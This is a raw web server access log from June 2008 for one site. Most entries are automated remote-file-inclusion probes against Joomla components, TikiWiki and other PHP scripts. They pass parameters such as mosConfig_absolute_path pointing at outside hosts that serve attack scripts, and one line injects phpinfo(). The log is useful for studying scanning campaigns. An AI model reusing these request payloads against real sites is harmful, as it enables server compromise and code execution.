82.56.44.1 - - [17/Jun/2008:11:38:00 -0700] "GET /logs/Scan%20tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=%20TikiWikihhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:11:38:07 -0700] "GET /logs/access_080215.log/index1.php?site=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.114.56.86 - - [17/Jun/2008:11:38:21 -0700] "GET /logs/access_080101.log HTTP/1.1" 200 216727 "-" "qudnikglbe4gmnoynxIwnwm" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:38:24 -0700] "GET //errors.php?error=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:38:24 -0700] "GET /logs//errors.php?error=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:11:38:27 -0700] "GET /logs/index1.php?site=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:11:38:27 -0700] "GET /index1.php?site=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.147.48 - - [17/Jun/2008:11:38:43 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.253.213.4 - - [17/Jun/2008:11:38:44 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.253.213.4 - - [17/Jun/2008:11:38:44 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.253.213.4 - - [17/Jun/2008:11:38:45 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.138.232.96 - - [17/Jun/2008:11:38:54 -0700] "GET /logs/access_080312.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/zip/idrox.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.232.96 - - [17/Jun/2008:11:38:58 -0700] "GET /logs/access_080312.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/zip/idrox.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.232.96 - - [17/Jun/2008:11:38:59 -0700] "GET /logs/access_080312.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:11:39:01 -0700] "GET /logs/index.php?url=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:11:39:02 -0700] "GET /logs/index.php?url=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:11:39:05 -0700] "GET /index.php?url=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 200 18405 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:11:39:09 -0700] "GET /index.php?url=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 200 18349 "-" "libwww-perl/5.805" "www.dmulk.com"
201.16.242.3 - - [17/Jun/2008:11:39:10 -0700] "GET /logs/access_080118.log///////////////?components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://microenterprise.net/Project/includes/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.138.232.96 - - [17/Jun/2008:11:39:10 -0700] "GET /logs/access_080312.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:39:36 -0700] "GET /logs/access_080507.log//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.26.142.244 - - [17/Jun/2008:11:39:37 -0700] "GET /logs/errors.php?error=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.26.142.244 - - [17/Jun/2008:11:39:38 -0700] "GET /errors.php?error=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:39:46 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:39:46 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
212.110.101.219 - - [17/Jun/2008:11:39:47 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.stoneponyband.com/horns/aed-per1.0.0/generatedFiles/license.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.110.101.219 - - [17/Jun/2008:11:39:47 -0700] "GET //ashnews.php?pathtoashnews=http://www.stoneponyband.com/horns/aed-per1.0.0/generatedFiles/license.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
91.184.2.186 - - [17/Jun/2008:11:39:53 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.184.2.186 - - [17/Jun/2008:11:39:53 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.5.10 - - [17/Jun/2008:11:39:57 -0700] "GET /logs//errors.php?error=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
70.86.5.10 - - [17/Jun/2008:11:39:57 -0700] "GET //errors.php?error=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
202.221.143.111 - - [17/Jun/2008:11:40:01 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [17/Jun/2008:11:40:01 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.224.22 - - [17/Jun/2008:11:40:18 -0700] "GET //header.php?abspath=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:40:18 -0700] "GET /logs/access_080215.log//errors.php?error=http://nicosahputra.ueuo.com/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:40:18 -0700] "GET /logs//errors.php?error=http://nicosahputra.ueuo.com/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:41:17 -0700] "GET /logs/access_071226.log//errors.php?error=http://nicosahputra.ueuo.com/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:41:17 -0700] "GET /logs//errors.php?error=http://nicosahputra.ueuo.com/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.208.5 - - [17/Jun/2008:11:41:27 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.pfreak.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.98.208.5 - - [17/Jun/2008:11:41:27 -0700] "GET //ashnews.php?pathtoashnews=http://www.pfreak.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.221.143.111 - - [17/Jun/2008:11:41:36 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [17/Jun/2008:11:41:36 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.138.232.96 - - [17/Jun/2008:11:41:39 -0700] "GET /logs/access_080312.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/zip/idrox.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.232.96 - - [17/Jun/2008:11:41:39 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/zip/idrox.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.232.96 - - [17/Jun/2008:11:41:39 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/zip/idrox.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.232.96 - - [17/Jun/2008:11:41:44 -0700] "GET /logs/access_080312.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.232.96 - - [17/Jun/2008:11:41:44 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.232.96 - - [17/Jun/2008:11:41:45 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.44.240.91 - - [17/Jun/2008:11:42:13 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.240.91 - - [17/Jun/2008:11:42:13 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.195.58.187 - - [17/Jun/2008:11:42:30 -0700] "GET /logs/ HTTP/1.0" 200 52259 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:42:36 -0700] "GET //errors.php?error=http://nicosahputra.ueuo.com/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.254.214.2 - - [17/Jun/2008:11:42:57 -0700] "GET /logs/index1.php?site=http://queb3.info/cruise/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.254.214.2 - - [17/Jun/2008:11:42:58 -0700] "GET /index1.php?site=http://queb3.info/cruise/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.34.140.215 - - [17/Jun/2008:11:43:13 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.140.215 - - [17/Jun/2008:11:43:13 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:43:35 -0700] "GET /logs/access_080126.log//errors.php?error=http://nicosahputra.ueuo.com/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:43:35 -0700] "GET /logs//errors.php?error=http://nicosahputra.ueuo.com/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
66.249.73.161 - - [17/Jun/2008:11:44:26 -0700] "GET / HTTP/1.1" 200 18257 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
81.174.65.190 - - [17/Jun/2008:11:44:39 -0700] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.174.65.190 - - [17/Jun/2008:11:44:40 -0700] "GET /logs/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.174.65.190 - - [17/Jun/2008:11:44:45 -0700] "GET /logs/access_080228.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [17/Jun/2008:11:45:05 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.234.98.113 - - [17/Jun/2008:11:45:15 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
211.234.98.113 - - [17/Jun/2008:11:45:15 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
211.234.98.113 - - [17/Jun/2008:11:45:15 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
211.115.110.116 - - [17/Jun/2008:11:45:16 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.115.110.116 - - [17/Jun/2008:11:45:16 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.115.110.116 - - [17/Jun/2008:11:45:16 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.236.177.197 - - [17/Jun/2008:11:45:24 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
211.236.177.197 - - [17/Jun/2008:11:45:24 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
211.236.177.197 - - [17/Jun/2008:11:45:24 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
200.29.147.48 - - [17/Jun/2008:11:45:38 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.147.48 - - [17/Jun/2008:11:45:38 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.32.116.114 - - [17/Jun/2008:11:45:39 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
211.32.116.114 - - [17/Jun/2008:11:45:39 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
72.29.81.233 - - [17/Jun/2008:11:45:39 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [17/Jun/2008:11:45:39 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.32.116.114 - - [17/Jun/2008:11:45:43 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
81.174.65.190 - - [17/Jun/2008:11:45:46 -0700] "GET /logs/access_080429.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.26.142.244 - - [17/Jun/2008:11:45:52 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.219.217.74 - - [17/Jun/2008:11:46:10 -0700] "GET /logs/access.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Jun/2008:11:46:11 -0700] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Jun/2008:11:46:11 -0700] "GET /logs/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.236.177.197 - - [17/Jun/2008:11:46:17 -0700] "GET /logs//admin/addons/archive/archive.php?adminfolder=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
211.236.177.197 - - [17/Jun/2008:11:46:17 -0700] "GET /logs/access_080312.log//admin/addons/archive/archive.php?adminfolder=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
211.236.177.197 - - [17/Jun/2008:11:46:17 -0700] "GET /logs/access_080228.log//admin/addons/archive/archive.php?adminfolder=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
211.236.177.197 - - [17/Jun/2008:11:46:18 -0700] "GET //admin/addons/archive/archive.php?adminfolder=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:46:19 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:46:20 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 200 18503 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
87.253.213.4 - - [17/Jun/2008:11:46:21 -0700] "GET /logs/access_080308.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
211.234.98.113 - - [17/Jun/2008:11:46:21 -0700] "GET /logs//admin/addons/archive/archive.php?adminfolder=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
211.234.98.113 - - [17/Jun/2008:11:46:21 -0700] "GET //admin/addons/archive/archive.php?adminfolder=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
211.234.98.113 - - [17/Jun/2008:11:46:21 -0700] "GET /logs/access_080228.log//admin/addons/archive/archive.php?adminfolder=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
211.234.98.113 - - [17/Jun/2008:11:46:21 -0700] "GET /logs/access_080312.log//admin/addons/archive/archive.php?adminfolder=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
211.115.110.116 - - [17/Jun/2008:11:46:21 -0700] "GET //admin/addons/archive/archive.php?adminfolder=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.253.213.4 - - [17/Jun/2008:11:46:21 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
211.115.110.116 - - [17/Jun/2008:11:46:21 -0700] "GET /logs/access_080228.log//admin/addons/archive/archive.php?adminfolder=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.115.110.116 - - [17/Jun/2008:11:46:21 -0700] "GET /logs//admin/addons/archive/archive.php?adminfolder=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.115.110.116 - - [17/Jun/2008:11:46:22 -0700] "GET /logs/access_080312.log//admin/addons/archive/archive.php?adminfolder=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.253.213.4 - - [17/Jun/2008:11:46:22 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
151.11.24.250 - - [17/Jun/2008:11:46:23 -0700] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.destarre.be/media/jenggot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.26.142.244 - - [17/Jun/2008:11:46:41 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.26.142.244 - - [17/Jun/2008:11:46:41 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.26.142.244 - - [17/Jun/2008:11:46:42 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.232.96 - - [17/Jun/2008:11:46:54 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/zip/idrox.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.232.96 - - [17/Jun/2008:11:46:58 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.32.116.114 - - [17/Jun/2008:11:47:04 -0700] "GET /logs//admin/addons/archive/archive.php?adminfolder=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
211.32.116.114 - - [17/Jun/2008:11:47:04 -0700] "GET /logs/access_080228.log//admin/addons/archive/archive.php?adminfolder=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
